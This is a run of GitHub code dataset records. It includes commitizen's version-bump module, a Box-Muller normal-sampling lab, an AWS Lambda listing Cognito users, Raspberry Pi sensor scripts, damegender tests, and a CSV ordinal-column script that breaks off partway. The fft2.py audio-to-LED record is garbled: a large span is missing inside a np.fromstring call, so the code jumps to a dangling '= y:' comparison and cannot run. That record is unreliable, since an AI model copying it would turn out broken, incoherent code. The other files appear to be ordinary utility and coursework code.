Otros/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33685730899","text":"import re\nfrom collections import OrderedDict\nfrom itertools import zip_longest\nfrom string import Template\nfrom typing import List, Optional, Union\n\nfrom packaging.version import Version\n\nfrom commitizen.defaults import MAJOR, MINOR, PATCH, bump_message\nfrom commitizen.exceptions import CurrentVersionNotFoundError\nfrom commitizen.git import GitCommit\n\n\ndef find_increment(\n commits: List[GitCommit], regex: str, increments_map: Union[dict, OrderedDict]\n) -> Optional[str]:\n\n if isinstance(increments_map, dict):\n increments_map = OrderedDict(increments_map)\n\n # Most important cases are major and minor.\n # Everything else will be considered patch.\n select_pattern = re.compile(regex)\n increment = None\n\n for commit in commits:\n for message in commit.message.split(\"\\n\"):\n result = select_pattern.search(message)\n if result:\n found_keyword = result.group(0)\n new_increment = None\n for match_pattern in increments_map.keys():\n if re.match(match_pattern, found_keyword):\n new_increment = increments_map[match_pattern]\n break\n\n if increment == \"MAJOR\":\n continue\n elif increment == \"MINOR\" and new_increment == \"MAJOR\":\n increment = new_increment\n elif increment == \"PATCH\" or increment is None:\n increment = new_increment\n\n return increment\n\n\ndef prerelease_generator(current_version: str, prerelease: Optional[str] = None) -> str:\n \"\"\"Generate prerelease\n\n X.YaN # Alpha release\n X.YbN # Beta release\n X.YrcN # Release Candidate\n X.Y # Final\n\n This function might return something like 'alpha1'\n but it will be handled by Version.\n \"\"\"\n if not prerelease:\n return \"\"\n\n version = Version(current_version)\n # version.pre is needed for mypy check\n if version.is_prerelease and version.pre and prerelease.startswith(version.pre[0]):\n prev_prerelease: int = version.pre[1]\n new_prerelease_number = prev_prerelease + 1\n else:\n new_prerelease_number = 0\n pre_version = f\"{prerelease}{new_prerelease_number}\"\n return pre_version\n\n\ndef semver_generator(current_version: str, increment: str = None) -> str:\n version = Version(current_version)\n prev_release = list(version.release)\n increments = [MAJOR, MINOR, PATCH]\n increments_version = dict(zip_longest(increments, prev_release, fillvalue=0))\n\n # This flag means that current version\n # must remove its prerelease tag,\n # so it doesn't matter the increment.\n # Example: 1.0.0a0 with PATCH/MINOR -> 1.0.0\n if not version.is_prerelease:\n\n if increment == MAJOR:\n increments_version[MAJOR] += 1\n increments_version[MINOR] = 0\n increments_version[PATCH] = 0\n elif increment == MINOR:\n increments_version[MINOR] += 1\n increments_version[PATCH] = 0\n elif increment == PATCH:\n increments_version[PATCH] += 1\n\n return str(\n f\"{increments_version['MAJOR']}.\"\n f\"{increments_version['MINOR']}.\"\n f\"{increments_version['PATCH']}\"\n )\n\n\ndef generate_version(\n current_version: str,\n increment: str,\n prerelease: Optional[str] = None,\n is_local_version: bool = False,\n) -> Version:\n \"\"\"Based on the given increment a proper semver will be generated.\n\n For now the rules and versioning scheme is based on\n python's PEP 0440.\n More info: https://www.python.org/dev/peps/pep-0440/\n\n Example:\n PATCH 1.0.0 -> 1.0.1\n MINOR 1.0.0 -> 1.1.0\n MAJOR 1.0.0 -> 2.0.0\n \"\"\"\n if is_local_version:\n version = Version(current_version)\n pre_version = prerelease_generator(str(version.local), prerelease=prerelease)\n semver = semver_generator(str(version.local), increment=increment)\n\n return Version(f\"{version.public}+{semver}{pre_version}\")\n else:\n pre_version = prerelease_generator(current_version, prerelease=prerelease)\n semver = semver_generator(current_version, increment=increment)\n\n # TODO: post version\n # TODO: dev version\n return Version(f\"{semver}{pre_version}\")\n\n\ndef update_version_in_files(\n current_version: str, new_version: str, files: List[str], *, check_consistency=False\n) -> None:\n \"\"\"Change old version to the new one in every file given.\n\n Note that this version is not the tag formatted one.\n So for example, your tag could look like `v1.0.0` while your version in\n the package like `1.0.0`.\n \"\"\"\n # TODO: separate check step and write step\n for location in files:\n filepath, *regexes = location.split(\":\")\n regex = regexes[0] if regexes else None\n\n with open(filepath, \"r\") as f:\n version_file = f.read()\n\n if regex:\n current_version_found, version_file = _bump_with_regex(\n version_file, current_version, new_version, regex\n )\n else:\n current_version_regex = _version_to_regex(current_version)\n current_version_found = bool(current_version_regex.search(version_file))\n version_file = current_version_regex.sub(new_version, version_file)\n\n if check_consistency and not current_version_found:\n raise CurrentVersionNotFoundError(\n f\"Current version {current_version} is not found in {location}.\\n\"\n \"The version defined in commitizen configuration and the ones in \"\n \"version_files are possibly inconsistent.\"\n )\n\n # Write the file out again\n with open(filepath, \"w\") as file:\n file.write(\"\".join(version_file))\n\n\ndef _bump_with_regex(version_file_contents, current_version, new_version, regex):\n current_version_found = False\n # Bumping versions that change the string length move the offset on the file contents as finditer keeps a\n # reference to the initial string that was used and calling search many times would lead in infinite loops\n # e.g.: 1.1.9 -> 1.1.20\n offset = 0\n for match in re.finditer(regex, version_file_contents, re.MULTILINE):\n left = version_file_contents[: match.end() + offset]\n right = version_file_contents[match.end() + offset :]\n\n line_break = right.find(\"\\n\")\n middle = right[:line_break]\n right = right[line_break:]\n\n if current_version in middle:\n offset += len(new_version) - len(current_version)\n current_version_found = True\n version_file_contents = (\n left + middle.replace(current_version, new_version) + right\n )\n return current_version_found, version_file_contents\n\n\ndef _version_to_regex(version: str):\n clean_regex = version.replace(\".\", r\"\\.\").replace(\"+\", r\"\\+\")\n return re.compile(f\"{clean_regex}\")\n\n\ndef create_tag(version: Union[Version, str], tag_format: Optional[str] = None) -> str:\n \"\"\"The tag and the software version might be different.\n\n That's why this function exists.\n\n Example:\n | tag | version (PEP 0440) |\n | --- | ------- |\n | v0.9.0 | 0.9.0 |\n | ver1.0.0 | 1.0.0 |\n | ver1.0.0.a0 | 1.0.0a0 |\n \"\"\"\n if isinstance(version, str):\n version = Version(version)\n\n if not tag_format:\n return str(version)\n\n major, minor, patch = version.release\n prerelease = \"\"\n # version.pre is needed for mypy check\n if version.is_prerelease and version.pre:\n prerelease = f\"{version.pre[0]}{version.pre[1]}\"\n\n t = Template(tag_format)\n return t.safe_substitute(\n version=version, major=major, minor=minor, patch=patch, prerelease=prerelease\n )\n\n\ndef create_commit_message(\n current_version: Union[Version, str],\n new_version: Union[Version, str],\n message_template: str = None,\n) -> str:\n if message_template is None:\n message_template = bump_message\n t = Template(message_template)\n return t.safe_substitute(current_version=current_version, new_version=new_version)\n","repo_name":"markokow/upwork_scrapers","sub_path":"scraper_env/lib/python3.8/site-packages/commitizen/bump.py","file_name":"bump.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21281062205","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 5 14:57:31 2020\r\n\r\n@author: Mridul Garg\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport numpy as np\r\nimport math\r\n\r\ndef PLOT(sequence, text):\r\n plt.hist(sequence, bins = 40, color = \"pink\")\r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Count\")\r\n plt.title(text)\r\n plt.show()\r\n\r\n\r\ndef Normal_0_5(result, text):\r\n n = len(result)\r\n sigma = 5**0.5\r\n mu = 0\r\n for i in range(n):\r\n result[i] = result[i]*5**0.5\r\n \r\n count, bins, ignored = plt.hist(result, bins = 40, color = \"lightblue\", density = True)\r\n plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *\r\n np.exp( - (bins - mu)**2 / (2 * sigma**2) ), color='darkgreen')\r\n \r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(text + \"- N(0, 5)\")\r\n \r\n plt.show()\r\n\r\ndef Normal_5_5(result, text):\r\n n = len(result)\r\n sigma = 5**0.5\r\n mu = 5\r\n for i in range(n):\r\n result[i] = result[i]*5**0.5 + 5 \r\n \r\n count, bins, ignored = plt.hist(result, bins = 40, color = \"lightblue\", density = True)\r\n plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *\r\n np.exp( - (bins - mu)**2 / (2 * sigma**2) ), color='darkgreen')\r\n \r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(text + \"- N(5, 5)\")\r\n \r\n plt.show()\r\n\r\ndef BOX_MULLER(n):\r\n start = time.time()*10000\r\n result = []\r\n \r\n for i in range(n):\r\n u1 = np.random.uniform(0.0, 1.0)\r\n u2 = np.random.uniform(0.0, 1.0)\r\n \r\n R = -2*np.log(u1)\r\n V = 2*np.pi*u2\r\n z1 = (R**0.5)*math.cos(V)\r\n z2 = (R**0.5)*math.sin(V)\r\n \r\n result.append(z1)\r\n result.append(z2)\r\n end = time.time()*10000\r\n print(\"Time elapsed for BOX_MULLER:\", end - start)\r\n print(\"Elements Generated:\", n*2)\r\n print(\"Mean:\", np.mean(result), \", Variance:\", np.var(result))\r\n PLOT(result, \"BOX_MULLER Plot, n = \" + str(2*n))\r\n \r\n Normal_5_5(result[:], \"BOX_MULLER\")\r\n Normal_0_5(result[:], \"BOX_MULLER\")\r\n \r\ndef MARSAGLIA_BRAY(n):\r\n start = time.time()*10000\r\n result = []\r\n rejected = 0\r\n \r\n for i in range(n):\r\n# X = 2\r\n while True:\r\n u1 = np.random.uniform(0.0, 1.0)\r\n u2 = np.random.uniform(0.0, 1.0)\r\n u1 = 2*u1 - 1\r\n u2 = 2*u2 - 1\r\n \r\n X = u1**2 + u2**2\r\n \r\n if X > 1:\r\n rejected += 1\r\n else:\r\n break\r\n \r\n Y = (-2*np.log(X)/X)**0.5\r\n z1 = u1*Y\r\n z2 = u2*Y\r\n \r\n result.append(z1)\r\n result.append(z2)\r\n \r\n end = time.time()*10000\r\n print(\"Time elapsed for MARSAGLIA_BRAY:\", end - start)\r\n print(\"Elements Generated:\", n*2)\r\n print(\"Mean:\", np.mean(result), \", Variance:\", np.var(result))\r\n print(\"rejected:\", rejected/(n+rejected), 1 - np.pi/4)\r\n PLOT(result, \"MARSAGLIA_BRAY Plot, n = \" + str(2*n))\r\n \r\n Normal_5_5(result[:], \"MARSAGLIA_BRAY\")\r\n Normal_0_5(result[:], \"MARSAGLIA_BRAY\") \r\n \r\nfor n in [50, 5000]:\r\n BOX_MULLER(n)\r\n print(\"-------------------------------\")\r\n# MARSAGLIA_BRAY(n)\r\n\r\nprint(\"*******************************\")\r\nprint(\"*******************************\")\r\n\r\nfor n in [50, 5000]:\r\n print(\"-------------------------------\")\r\n MARSAGLIA_BRAY(n)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Polymatic/Monte_Carlo_Simulation","sub_path":"Lab05/180123028_Mridul_q1.py","file_name":"180123028_Mridul_q1.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"688100700","text":"import logging\nfrom layers.base import EventBase, ResultBase, Response\nimport boto3\nimport os\n\nLOGGER = logging.getLogger(__name__)\n\ndef handler(e, c):\n event = Event(e, c)\n event.handle()\n return event.response()\n\nclass Result(ResultBase):\n QUERY_SUCCEEDED = (200, \"QUERY SUCCEEDED\", \"Query succeeded\")\n UNKNOWN = (500, \"SERVER_ERROR\", \"Server Error\")\n\nclass Event(EventBase):\n def __init__(self, event, context):\n EventBase.__init__(self, event, context)\n self.__cognito_idp_client = boto3.client('cognito-idp')\n\n def handle(self):\n result, data = self.get_users()\n self._response = Response(result, data).to_json()\n\n def get_users(self):\n response = self.__cognito_idp_client.list_users_in_group(\n UserPoolId = os.environ['COGNITO_POOL_ID'],\n GroupName = self._event['pathParameters']['tenant_id'],\n )\n userArray = []\n for user in response['Users']:\n newUser = {\n 'Username': user['Username'],\n 'Attributes': user['Attributes'],\n 'Enabled': user['Enabled'],\n 'UserStatus': user['UserStatus']\n }\n userArray.append(newUser)\n finalResponse = {\n 'Users': userArray\n }\n return Result.QUERY_SUCCEEDED, finalResponse","repo_name":"nicolasbolanosamazon/AWSomeBuilderProject","sub_path":"services/user_manager/get_users_group/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74093757920","text":"#!/usr/bin/python\nimport json\nimport alsaaudio\nimport numpy as np\nimport collections\nimport sys\nimport time\nimport math\nimport flaschen\n\nrows = 32\ncols = 512\n\nON = (0,255,0)\nRED = (255,0,0)\nOFF = (0,0,0)\n\nft = flaschen.Flaschen('10.1.255.209', 1337, 512, 32, transparent=True, layer=2)\n\nplotMax = 3\noffset = 9\nplotStart = 0\nplotEnd = 1024\nperiodsize = 1500\nbufferLength = 4800\nsampleRate = 44100\nbuffer = collections.deque(bufferLength*[0], bufferLength)\n\ninp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, device='default')\ninp.setchannels(1)\ninp.setrate(sampleRate)\ninp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\nperiodsize = inp.setperiodsize(periodsize)\n\nfor i in range(0, int(bufferLength/periodsize)):\n buffer.extend(np.fromstring(inp.read()[1], dtype=\">h\"))\n\nwith open(\"./fft_data\", \"r\") as datafile:\n noiseOffset = json.loads(datafile.read())\n\nwhile True:\n datalength, data = inp.read()\n if (datalength != periodsize):\n continue\n buffer.extend(np.fromstring(data, dtype=\"= y:\n if y >= rows-3:\n ft.set(x,32-y,RED)\n ft.set(x+1,32-y,RED)\n else:\n ft.set(x,32-y,ON)\n ft.set(x+1,32-y,ON)\n else:\n ft.set(x,32-y,OFF)\n ft.set(x+1,32-y,OFF)\n\n ft.send()\n","repo_name":"bitbyt3r/led-stuff","sub_path":"fft2.py","file_name":"fft2.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1175326895","text":"import unittest\nfrom app.dame_genderguesser import DameGenderGuesser\nfrom app.dame_statistics import DameStatistics\nimport collections\ncollections.Callable = collections.abc.Callable\n\n\nclass TddInPythonExample(unittest.TestCase):\n\n def test_genderguesser_list(self):\n dgg = DameGenderGuesser()\n g1 = dgg.guess(\"Sara\", gender_encoded=False)\n self.assertEqual(g1, \"female\")\n g2 = dgg.guess(\"Sara\", gender_encoded=True)\n self.assertEqual(g2, 0)\n g3 = dgg.guess(\"Laura\", gender_encoded=False)\n self.assertEqual(g3, \"female\")\n g4 = dgg.guess(\"Laura\", gender_encoded=True)\n self.assertEqual(g4, 0)\n\n def test_dame_genderguesser_gender_list(self):\n dgg = DameGenderGuesser()\n gl = dgg.csv2gender_list(path=\"files/names/partial.csv\")\n self.assertEqual(gl, [1, 1, 1, 1, 2, 1, 0, 0, 1, 1,\n 2, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1])\n self.assertEqual(len(gl), 21)\n self.assertEqual(dgg.females, 3)\n self.assertEqual(dgg.males, 16)\n self.assertEqual(dgg.unknown, 2)\n\n def test_dame_genderguesser_guess_list(self):\n dgg = DameGenderGuesser()\n self.assertEqual(['male', 'male', 'male', 'male', 'male',\n 'male', 'female', 'female', 'male', 'male'],\n dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=False)[0:10])\n self.assertEqual([1, 1, 1, 1, 1, 1, 0, 0, 1, 1],\n dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=True)[0:10])\n\n def test_dame_genderguesser_accuracy(self):\n dgg = DameGenderGuesser()\n ds = DameStatistics()\n gl1 = dgg.csv2gender_list(path=\"files/names/partial.csv\")\n gl2 = dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=True)\n self.assertTrue(ds.accuracy_score_dame(gl1, gl2) >= 0.5)\n # self.assertTrue(ds.accuracy(path=\"files/names/partial.csv\") >= 0.5)\n\n def test_dame_genderguesser_keyscountries(self):\n dgg = DameGenderGuesser()\n gb = dgg.keyscountries[\"30\"]\n us = dgg.keyscountries[\"32\"]\n self.assertEqual(gb, \"Great Britain\")\n self.assertEqual(us, \"USA\")\n\n def test_dame_genderguesser_keysfrequencies(self):\n dgg = DameGenderGuesser()\n rare = dgg.keysfrequencies[\"1\"]\n extremely_common = dgg.keysfrequencies[\"D\"]\n self.assertEqual(rare, \"rare\")\n self.assertEqual(extremely_common, \"extremely common\")\n \n","repo_name":"davidam/damegender","sub_path":"src/damegender/test/test_dame_genderguesser.py","file_name":"test_dame_genderguesser.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"40409528407","text":"#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n\nTRIG = 11\nECHO = 12\n\ndef setup():\n\tGPIO.setmode(GPIO.BOARD)\n\tGPIO.setup(ECHO, GPIO.IN)\n\tGPIO.setup(TRIG, GPIO.OUT)\n\tGPIO.output(TRIG, GPIO.HIGH)\n\n\ndef distance():\n\tGPIO.output(TRIG, 0)\n\ttime.sleep(0.000002)\n\n\tGPIO.output(TRIG, 1)\n\ttime.sleep(0.00001)\n\tGPIO.output(TRIG, 0)\n\n\twhile GPIO.input(ECHO) == 0:\n\t\ta = 0\n\ttime1 = time.time()\n\twhile GPIO.input(ECHO) == 1:\n\t\ta = 1\n\ttime2 = time.time()\n\n\tduring = time2 - time1\n\treturn during * 340 / 2 * 100\n\ndef loop():\n\twhile True:\n\t\tdis = distance()\n\t\tprint (int(dis), 'cm')\n\t\tprint ('')\n\t\tif dis < 20:\n\t\t\tbeep(0.5)\n\t\toff()\n\t\ttime.sleep(0.5)\ndef on():\n GPIO.output(TRIG, GPIO.LOW)\n\ndef off():\n GPIO.output(TRIG, GPIO.HIGH)\n\ndef beep(x):\n on()\n time.sleep(x)\n off()\n time.sleep(x)\n\ndef destroy():\n GPIO.output(TRIG, GPIO.HIGH)\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n\tsetup()\n\toff()\n\ttry:\n\t\tloop()\n\texcept KeyboardInterrupt:\n\t\tdestroy()\n","repo_name":"NoahB7/CS4363-InternetofThingsDevelopment-FacialRecognitionSecuritySystem","sub_path":"Labs/Lab3Combo.py","file_name":"Lab3Combo.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23865713672","text":"#!/bin/python3;\na=\"\"\"\n\n\n\nThis script will insert a row before the first row of the supplied CSV file.\nEach field of this row will contain the numeric value of the ordinal position of the given field.\n\nThis script will also insert a column before the first column of the supplied CSV file.\nThe field of this column will contain the numeric value of the ordinal position of the record it is now part of.\n\n\npushd .;cd /local/data/development.minor/KAUST/BORG/try1;\n\nexport src_csv_dataset_file_name=\"../raw_data/2020-05-03/BORG_DDIEM__clinical_logs.2020-05-03.1213hrs.csv\";\n\nworking_dir_file_name=\"/local/data/tmp/BORG_DDIEM/BORG_DDIEM__parse_clinical_logs_CSV.working_dir\" \\\n && count_of_workers=1 \\\n && log_file_name=\"/local/data/tmp/BORG_DDIEM/logs/BORG_DDIEM__dataset.csv.log.`date +%Y-%m-%d.%H%M.%S.%N.%Z`\" \\\n && echo `date +%Y-%m-%d.%H%M.%S.%N.%Z`\", log_file_name is:'${log_file_name}'\" \\\n && mkdir -p \"$(dirname ${log_file_name})\" \\\n && pushd . && cd /local/data/development.minor/KAUST/BORG/try1 \\\n && PYTHON_HOME=\"/local/data/apps/python/3.8.0\" \\\n && date && time \"${PYTHON_HOME}\"/bin/python3 src/py/clinical_logs_data_transformation/BORG_DDIEM__parse_clinical_logs_CSV.py \\\n -f\"${src_csv_dataset_file_name}\" \\\n -d\"/local/data/development.minor/KAUST/BORG/raw_data\" \\\n --count_of_workers=${count_of_workers} \\\n 2>&1|tee \"${log_file_name}\" \\\n && popd && date;\n \nrm -rf /local/data/development.minor/KAUST/BORG/raw_data/2020-*/.~lock.*\n\n\"\"\";\n\n#from xml.sax import saxutils;\n#import xml.sax;\n\nimport sys;\nimport os;\nimport getopt;\nfrom optparse import OptionParser;\nimport errno;\nimport csv;\nimport re;\nimport time;\nimport json;\nimport logging;\nimport errno;\nimport sys, traceback;\nimport datetime;\nimport socket;\nimport multiprocessing;\n\n\n\n\n\n\nLOG_FORMAT=('%(levelname) -5s processes_id:%(process)d time:%(asctime)s %(name) -10s [%(pathname)s %(module)s %(funcName) '\n '-15s %(lineno) -5d]: %(message)s');\nLOGGER = logging.getLogger(__name__);\n\ndef run_BORG_DDIEM__parse_clinical_logs_CSV(\n w\n ,queue\n ,worker_id\n):\n try:\n w.run();\n queue.put(w._processing_outcome__dict);\n except KeyboardInterrupt:\n d.stop();\nclass BORG_DDIEM__parse_clinical_logs_CSV():\n def __init__(\n self\n ,hostname,ipAddress,ppid\n ,task_id\n ,task_formulation_timestamp\n ,worker_id\n ,worker_number\n ,working_dir_file_name\n ,_srcCSVFileName\n ,_destCSVDirFileName\n ):\n doc=\"\"\"\n an object if this class performs the tranformation of XML to JSON.\n \"\"\";\n self.LOG_FORMAT=('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '\n '-35s %(lineno) -5d: %(message)s');\n self.logging_level__value=\"INFO\";\n \n self.working_dir_file_name=working_dir_file_name;\n self.hostname=hostname;\n self.ipAddress=ipAddress;\n self.ppid=os.getppid();\n self.pid=os.getpid();\n self.task_formulation_timestamp=task_formulation_timestamp;\n self.task_id=task_id;\n self.worker_id=worker_id;\n self.worker_number=worker_number;\n self._srcCSVFileName=_srcCSVFileName;\n self._destCSVDirFileName=_destCSVDirFileName;\n self._processing_outcome__dict=None;\n \n try:\n if(_srcCSVFileName==None or len(_srcCSVFileName.strip())<0):\n pass;\n raise ValueError(\"_srcCSVFileName is empty the supplied value is '%s'\"%(_srcCSVFileName));\n except ValueError as error:\n #see \"/local/data/BCL_FE_ABI3730_sequencer_plate_data_generator_jobs_data/2018/2018-09/2018-09-20/2018-09-20_171025_103.processing_outcome.json\"\n #LOGGER.info(\" '%s', -------------- cmd is:'%s', row_cnt is:%d\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),cmd,row_cnt));\n LOGGER.exception(error);\n LOGGER.exception(traceback.format_exc());\n \n raise error;\n def run(self):\n self._processing_outcome__dict=include_ordinal_position_fields(\n self.hostname,self.ipAddress,self.ppid,self.pid\n ,self.working_dir_file_name\n ,self.task_id\n ,self.task_formulation_timestamp\n ,self.worker_id\n ,self.worker_number\n ,self._srcCSVFileName\n ,self._destCSVDirFileName\n );\n LOGGER.info(\"self._processing_outcome__dict is:'%s'\"%(json.dumps(self._processing_outcome__dict,indent=4)));\n def get_processing_outcome(self):\n return self._processing_outcome__dict;\n\ndef include_ordinal_position_fields(\n hostname,ipAddress,ppid,pid\n ,working_dir_file_name\n ,task_id\n ,task_formulation_timestamp\n ,worker_id\n ,worker_number\n ,_srcCSVFileName\n ,_destCSVDirFileName\n):\n pass;\n processing_outcome__dict={};\n task_commencement_time_obj=datetime.datetime.now();\n task_commencement_time_str=task_commencement_time_obj.strftime('%Y-%m-%d %H:%M:%S.%f');\n \n \"\"\"\n \"\"\";\n \n src_dataset_csv_file_name=_srcCSVFileName;\n dest_dataset_csv_file_name=os.path.join(\n _destCSVDirFileName\n ,os.path.basename(os.path.dirname(_srcCSVFileName))\n ,\"%s.parsed.csv\"%(os.path.splitext(os.path.basename(_srcCSVFileName))[0])\n );\n LOGGER.info(\"dest_dataset_csv_file_name is:'%s'\"%(dest_dataset_csv_file_name));\n mkdir_p(os.path.dirname(os.path.abspath(dest_dataset_csv_file_name)));\n \n src_dataset_csv_fh=None;\n src_dataset_csv_reader=None;\n src_dataset_csv_fh=open(src_dataset_csv_file_name,\"r\");\n src_dataset_csv_reader=csv.reader(\n src_dataset_csv_fh\n ,delimiter=\",\"\n ,quotechar='\"'\n ,quoting=csv.QUOTE_MINIMAL\n );\n \n dest_dataset_csv_fh=None;\n dest_dataset_csv_writer=None;\n dest_dataset_csv_fh=open(dest_dataset_csv_file_name,\"w\");\n dest_dataset_csv_writer=csv.writer(dest_dataset_csv_fh,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL);\n \n row2=[];\n cnt_of_fields__max=0;\n cnt_of_fields=0;\n row_cnt=0;\n src_dataset_csv_fh.seek(0);\n for row in src_dataset_csv_reader:\n row_cnt+=1;\n if(len(row)>cnt_of_fields__max):\n cnt_of_fields__max=len(row);\n del row2[:];\n for i, val in enumerate(row):\n if(row[i]==None):\n row[i]=\"\";\n else:\n row[i]=row[i].strip();\n if(row_cnt==1):\n \"\"\"\n We have the header record, lets generate and insert a row in the destination CSV, the fields of this row would contain the numeric ordinal position of the field.\n \"\"\"\n row2.append(0);\n for i, val in enumerate(row):\n row2.append(i+1);\n dest_dataset_csv_writer.writerow(row2);\n row2=[];\n row2.append(row_cnt-1);\n row2.extend(row[:]);\n dest_dataset_csv_writer.writerow(row2);\n dest_dataset_csv_fh.close();\n src_dataset_csv_fh.close();\n \n \n task_completion_time_obj=datetime.datetime.now();\n task_completion_time_str=\"%s\"%(task_completion_time_obj.strftime('%Y-%m-%d %H:%M:%S.%f'));\n duration_obj=task_completion_time_obj-task_commencement_time_obj;\n duration_ms=duration_obj.total_seconds()*1000;\n \n processing_outcome__dict[\"task_commencement_time_str\"]=task_commencement_time_str;\n processing_outcome__dict[\"task_completion_time_str\"]=task_completion_time_str;\n processing_outcome__dict[\"duration_ms\"]=duration_ms;\n \n processing_outcome__dict[\"hostname\"]=hostname;\n processing_outcome__dict[\"ipAddress\"]=ipAddress;\n processing_outcome__dict[\"ppid\"]=ppid;\n processing_outcome__dict[\"pid\"]=pid;\n processing_outcome__dict[\"task_id\"]=task_id;\n processing_outcome__dict[\"task_formulation_timestamp_str\"]=task_formulation_timestamp.strftime('%Y-%m-%d %H:%M:%S.%f');\n processing_outcome__dict[\"worker_id\"]=worker_id;\n processing_outcome__dict[\"worker_number\"]=worker_number;\n processing_outcome__dict[\"src_dataset_csv_file_name\"]=src_dataset_csv_file_name;\n processing_outcome__dict[\"dest_dataset_csv_file_name\"]=dest_dataset_csv_file_name;\n processing_outcome__dict[\"cnt_of_fields__max\"]=cnt_of_fields__max;\n \n return processing_outcome__dict;\n \n\n \ndef getLocalIPAddress():\n s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);\n s.connect(('google.com',80));\n return s.getsockname()[0];\n\ndef touch(file_name):\n mkdir_p(os.path.abspath(os.path.join(file_name, os.pardir)));\n with open(file_name,'a'):\n os.utime(file_name,None);\n\nimport errno;\ndef mkdir_p(path):\n if(not(os.path.exists(path) and os.path.isdir(path))):\n try:\n os.makedirs(path,exist_ok=True);\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise \n\n\ndef format_my_nanos(nanos):\n dt = datetime.datetime.fromtimestamp(nanos / 1e9)\n #return '{}.{:09.0f}'.format(dt.strftime('%Y-%m-%dT%H:%M:%S'), nanos % 1e9);\n return '{}_{:09.0f}'.format(dt.strftime('%Y%m%d%H%M%S'), nanos % 1e9);\n\n\ndef timestamp_from_nano_seconds(nanos):\n dt = datetime.datetime.fromtimestamp(nanos / 1e9)\n #return '{}.{:09.0f}'.format(dt.strftime('%Y-%m-%dT%H:%M:%S'), nanos % 1e9);\n return '{}_{:09.0f}'.format(dt.strftime('%Y/%m/%d %H:%M:%S'), nanos % 1e9);\n\n\nclass InfiniteTimer():#see https://stackoverflow.com/questions/12435211/python-threading-timer-repeat-function-every-n-seconds\n \"\"\"A Timer class that does not stop, unless you want it to.\"\"\";\n def __init__(self, seconds, target, countdown__upperbound):\n self._should_continue = False;\n self.is_running = False;\n self.seconds = seconds;\n self.target = target;\n self.thread = None;\n self.countdown__upperbound=countdown__upperbound;\n \n def _handle_target(self):\n self.is_running = True;\n self.target();\n self.is_running = False;\n self._start_timer();\n \n def _start_timer(self):\n if self._should_continue: # Code could have been running when cancel was called.;\n self.thread = threading.Timer(self.seconds, self._handle_target);\n LOGGER.info(\"self.countdown__upperbound is:%d\"%(self.countdown__upperbound));\n if(self.countdown__upperbound>0):\n self.thread.start();\n self.countdown__upperbound-=1;\n else:\n self._should_continue=False;\n \n def start(self):\n if not self._should_continue and not self.is_running:\n self._should_continue = True;\n self._start_timer();\n else:\n print(\"Timer already started or running, please wait if you're restarting.\");\n \n def cancel(self):\n if self.thread is not None:\n self._should_continue = False # Just in case thread is running and cancel fails.;\n self.thread.cancel();\n else:\n print(\"Timer never started or failed to initialize.\");\n\n\n\nfrom xml.sax import make_parser\nfrom xml.sax.handler import feature_namespaces\n\nif __name__ == '__main__':\n task_formulation_timestamp=None;#datetime.datetime.strptime('20180910_135822_123456', '%Y%m%d_%H%M%S_%f');\n task_formulation_timestamp_str=None;#'20180910_135822_123456';\n working_dir_file_name=None;\n src_csv_dataset_file_name=None;\n dest_csv_dataset_dir_name=None;\n count_of_workers=1;\n usage=\"usage: %prog [options] arg1 [[arg2]..]\"\n version=\"version: 0.001\"\n\n import argparse;\n parser=argparse.ArgumentParser();\n try:\n parser.add_argument(\"-t\",\"--task_formulation_timestamp_str\",action=\"append\",type=str,dest=\"op__task_formulation_timestamp_str\",help=\"\"\"\n This variable will contain the current timestamp in 'Ymd_HMS_f' format, for example '20180910_135822_123456'. This timestamp will be the bases of the task id of this job.\n \"\"\");\n parser.add_argument(\"-o\",\"--working_dir_file_name\",action=\"append\",type=str,dest=\"op__working_dir_file_name\",help=\"\"\"\n The full path to the directory where temporary data will be written.\n \"\"\");\n parser.add_argument(\"-f\",\"--src_csv_dataset_file_name\",action=\"append\",type=str,dest=\"op__src_csv_dataset_file_name\",help=\"The full path to the CSV file where the input dataset is to be found.\")\n 